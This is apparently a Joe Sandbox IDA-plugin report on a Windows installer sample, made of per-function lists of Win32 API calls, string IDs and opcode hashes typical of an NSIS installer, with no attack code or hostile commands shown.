                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                          • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                          • Opcode Fuzzy Hash: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                          • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                          Function 00404F63 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                          • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                          • DeleteObject.GDI32(00000000), ref: 0040505D
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                          • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                          • GlobalFree.KERNEL32(?), ref: 0040539D
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                          • ShowWindow.USER32(?,00000000), ref: 00405547
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                          • ShowWindow.USER32(00000000), ref: 00405559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                          • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                          Function 00403FF7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                          • ShowWindow.USER32(?), ref: 00404053
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                          • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                          • DestroyWindow.USER32 ref: 00404092
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                          • GetDlgItem.USER32(?,?), ref: 004040CA
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                          • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                          • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                          • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                          • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                          • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                          • EnableWindow.USER32(?,?), ref: 004042DE
                                                          • EnableWindow.USER32(?,?), ref: 004042F9
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                          • EnableMenuItem.USER32(00000000), ref: 00404316
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                          • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                          • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                          • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 1860320154-0
                                                          • Opcode ID: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction ID: 8cad316efbf8f9c89f6feec2797fb874042f4abab253e3557332251604c97906
                                                          • Opcode Fuzzy Hash: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction Fuzzy Hash: C6C1A1B1500204BBDB206F61EE89E2B3AA8FB85755F01453EF751B51F0CB39A8529B2D
                                                          Function 00403C49 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                            • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                          • lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,00441800,00000000,0043F000,00008001), ref: 00403CCA
                                                          • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D4A
                                                          • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                          • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D68
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403DB1
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                          • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                          • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-1115850852
                                                          • Opcode ID: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction ID: c722afd28cb3ad108a11d8546cd61d6ece1c23d3a169ae69e987cf65e7f86a01
                                                          • Opcode Fuzzy Hash: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction Fuzzy Hash: 7961C370500700BED620AF66AD46F2B3A6CEB85B5AF40053FF945B22E2DB7C5941CA6D
                                                          Function 004046B5 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                          • GetSysColor.USER32(?), ref: 00404795
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                          • lstrlenW.KERNEL32(?), ref: 004047B6
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                          • SendMessageW.USER32(00000000), ref: 00404838
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                          • SetCursor.USER32(00000000), ref: 004048B7
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                          • SetCursor.USER32(00000000), ref: 004048D3
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: ,F@$N
                                                          • API String ID: 3103080414-1819947528
                                                          • Opcode ID: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction ID: ccb0ec9a7d9d767aff215416cd1a2e620de701fb5c4a8d8609e67ea5798c0c5e
                                                          • Opcode Fuzzy Hash: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction Fuzzy Hash: 046192F1900209BFDB10AF64DD85EAA7B69FB84315F00853AFB05B65E0C778A951CF98
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                          • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                          Function 004061BD Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                          • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                          • wsprintfA.USER32 ref: 0040623C
                                                          • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                          • Instruction ID: 21ba76f912769f78f8e3df01d85e3e27af82f360ac84a16f7af8f01611abcd2b
                                                          • Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                          • Instruction Fuzzy Hash: 66314330240325BBD2206B659D48F6B3B6CDF45708F16043EFD42B62C2DA3C982486BD
                                                          Function 004049E7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                          • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B4E
                                                          • lstrcatW.KERNEL32(?,004326A0), ref: 00404B5A
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                            • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                            • Part of subcall function 00406825: CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                            • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                            • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                            • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A
                                                          • API String ID: 2624150263-3554254475
                                                          • Opcode ID: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction ID: 819d6111372f9eb468737b2dc9595d459319e5efb98401d1644bfd8e85b56d65
                                                          • Opcode Fuzzy Hash: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction Fuzzy Hash: 14A180B1901208ABDB11EFA5DD45BAFB7B8EF84314F11803BF601B62D1D77C9A418B69
                                                          Function 004030A2 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004030B3
                                                          • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030CF
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 0040311B
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00403251
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                          • Error launching installer, xrefs: 004030F2
                                                          • Inst, xrefs: 00403187
                                                          • soft, xrefs: 00403190
                                                          • Null, xrefs: 00403199
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-527102705
                                                          • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction ID: 55eb758a8cc994b5b8f5e8324c308f37a69edd03a8198e206d37cac48cd63750
                                                          • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction Fuzzy Hash: E9519171900204AFDB209FA5DD86B9E7EACEB09356F20417BF504B62D1C7789F408BAD
                                                          Function 004065B4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066D6
                                                          • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004066EC
                                                          • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040674A
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                          • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 0040677E
                                                          • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004067D8
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 004066A7
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406778
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4024019347-730719616
                                                          • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction ID: fc4c1bf1ff31ba1b34cdfc75387d7881e57296f2874843d1a5ebc397bafcf832
                                                          • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction Fuzzy Hash: D16135716042009BD720AF24DD80B6B76E8EF85328F12453FF647B32D0DB7D9961865E
                                                          Function 004032D9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
